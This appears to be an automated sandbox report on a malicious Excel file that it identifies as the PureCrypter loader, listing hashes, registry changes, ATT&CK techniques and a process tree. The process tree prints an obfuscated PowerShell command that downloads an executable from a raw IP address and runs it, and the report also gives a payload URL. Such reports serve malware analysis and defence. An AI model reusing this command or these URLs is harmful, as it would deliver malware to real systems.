purecrypter | 524784571b2403c96f0d80401d75a69ef4ce4d6f263966100a4b604b069cab26

Analysis

max time kernel
149s
max time network
150s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
11-06-2024 18:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Magnet Product List Drawing DESIGN.xls
Size

627KB
MD5

40c80e5b61e3f50321933f795b672f61
SHA1

7bea369528e82bac7198de4d2f78fa0fc824cbc5
SHA256

524784571b2403c96f0d80401d75a69ef4ce4d6f263966100a4b604b069cab26
SHA512

7bee2b3acbc25c23a2c4cff02e18203d03c06d75bb29b6120771aa599dfc16c6bbe20a209e4e266be3dd04dbbdbf0480e6181f8cb3683b25b3034e6734705a1e
SSDEEP

12288:JqFzu4L62Ndp4EaPmz1Iyqko/lvBtfRqLBwzirb60RzkE7V7F:Ozu4L62NdSBmzcndfRqqiJzLJ

Score

10^/10

purecrypter downloader loader

Malware Config

Extracted

Family

purecrypter

https://www1.militarydefensenow.com/Bavguvo.dat

Signatures

PureCrypter
PureCrypter is a .NET malware loader first seen in early 2021.
loader downloader purecrypter

Blocklisted process makes network request 4 IoCs

flow	pid	Process
17	804	mshta.exe
18	804	mshta.exe
19	804	mshta.exe
21	536	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
2880	sihost.exe

Loads dropped DLL 1 IoCs

pid	Process
536	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 32 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1876	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
536	powershell.exe
536	powershell.exe
536	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	536	powershell.exe
Token: SeDebugPrivilege	2880	sihost.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1876	EXCEL.EXE
1876	EXCEL.EXE
1876	EXCEL.EXE
1876	EXCEL.EXE
1876	EXCEL.EXE

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 804 wrote to memory of 1560	804	mshta.exe	32
PID 804 wrote to memory of 1560	804	mshta.exe	32
PID 804 wrote to memory of 1560	804	mshta.exe	32
PID 804 wrote to memory of 1560	804	mshta.exe	32
PID 1560 wrote to memory of 536	1560	cmd.exe	34
PID 1560 wrote to memory of 536	1560	cmd.exe	34
PID 1560 wrote to memory of 536	1560	cmd.exe	34
PID 1560 wrote to memory of 536	1560	cmd.exe	34
PID 536 wrote to memory of 936	536	powershell.exe	35
PID 536 wrote to memory of 936	536	powershell.exe	35
PID 536 wrote to memory of 936	536	powershell.exe	35
PID 536 wrote to memory of 936	536	powershell.exe	35
PID 936 wrote to memory of 1776	936	csc.exe	36
PID 936 wrote to memory of 1776	936	csc.exe	36
PID 936 wrote to memory of 1776	936	csc.exe	36
PID 936 wrote to memory of 1776	936	csc.exe	36
PID 536 wrote to memory of 2880	536	powershell.exe	38
PID 536 wrote to memory of 2880	536	powershell.exe	38
PID 536 wrote to memory of 2880	536	powershell.exe	38
PID 536 wrote to memory of 2880	536	powershell.exe	38

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Magnet Product List Drawing DESIGN.xls"
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1876

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:804
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c POweRSHeLl.ExE -eX bYpaSs -nOP -w 1 -c DEvICEcREDentIAlDepLoyMent ; iEx($(Iex('[SySTEM.TEXT.enCodiNG]'+[ChaR]0X3A+[chAr]58+'uTf8.GetsTRINg([sysTem.CONvERT]'+[ChAr]0X3a+[CHAR]58+'frOMbASe64STRInG('+[cHar]0X22+'JHpsNEZhICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlUmRFRmluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxtb04uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVWVmZHUmVnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWElRa3Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLc05FdFcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmJqcXJzTmlzWWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRnRUF6aENKWlUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHpsNEZhOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNjcuMjA3LjE2Ni4xNzUvTTEwMDZUL2xzYXNzLmV4ZSIsIiRlTlY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO3NUYXJ0LXNMRWVQKDMpO3NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chaR]34+'))')))"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1560
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    POweRSHeLl.ExE -eX bYpaSs -nOP -w 1 -c DEvICEcREDentIAlDepLoyMent ; iEx($(Iex('[SySTEM.TEXT.enCodiNG]'+[ChaR]0X3A+[chAr]58+'uTf8.GetsTRINg([sysTem.CONvERT]'+[ChAr]0X3a+[CHAR]58+'frOMbASe64STRInG('+[cHar]0X22+'JHpsNEZhICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlUmRFRmluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxtb04uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVWVmZHUmVnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWElRa3Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLc05FdFcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmJqcXJzTmlzWWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRnRUF6aENKWlUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHpsNEZhOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNjcuMjA3LjE2Ni4xNzUvTTEwMDZUL2xzYXNzLmV4ZSIsIiRlTlY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO3NUYXJ0LXNMRWVQKDMpO3NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chaR]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:536
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ybrwpize.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:936
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES41E1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC41E0.tmp"
        5⤵
        
        PID:1776
  - - C:\Users\Admin\AppData\Roaming\sihost.exe
      "C:\Users\Admin\AppData\Roaming\sihost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1495DD322A24490E2BF2FAABAE1C61

Filesize
299B

MD5
5ae8478af8dd6eec7ad4edf162dd3df1

SHA1
55670b9fd39da59a9d7d0bb0aecb52324cbacc5a

SHA256
fe42ac92eae3b2850370b73c3691ccf394c23ab6133de39f1697a6ebac4bedca

SHA512
a5ed33ecec5eecf5437c14eba7c65c84b6f8b08a42df7f18c8123ee37f6743b0cf8116f4359efa82338b244b28938a6e0c8895fcd7f7563bf5777b7d8ee86296

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
37a3633e59b0a273769ae340fd67996b

SHA1
c33112fdf8a10568522c6be9d1b87933050cb349

SHA256
aa8d3d507c585341b0f4c8a84abc8658332cd8e9034a2a6e0dbfe81604695118

SHA512
645d68490a525edd4ae945e4d8d38f2b56550b794fa15e0ddde06e848ccdcb1100e11574d9b33c3496a396157ee0443b5a902cfbb32fb8001dcd4a64a44a9bde

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1B1495DD322A24490E2BF2FAABAE1C61

Filesize
192B

MD5
8f4fdcb4228e636dc7faa7c3ea355fec

SHA1
5c526df567a576eff8343d45f189829d8ba2c5ff

SHA256
717b507c55edeb4c2125babbf4485aa5f3fe6573f10b5fe0e3efa26f6a44dcef

SHA512
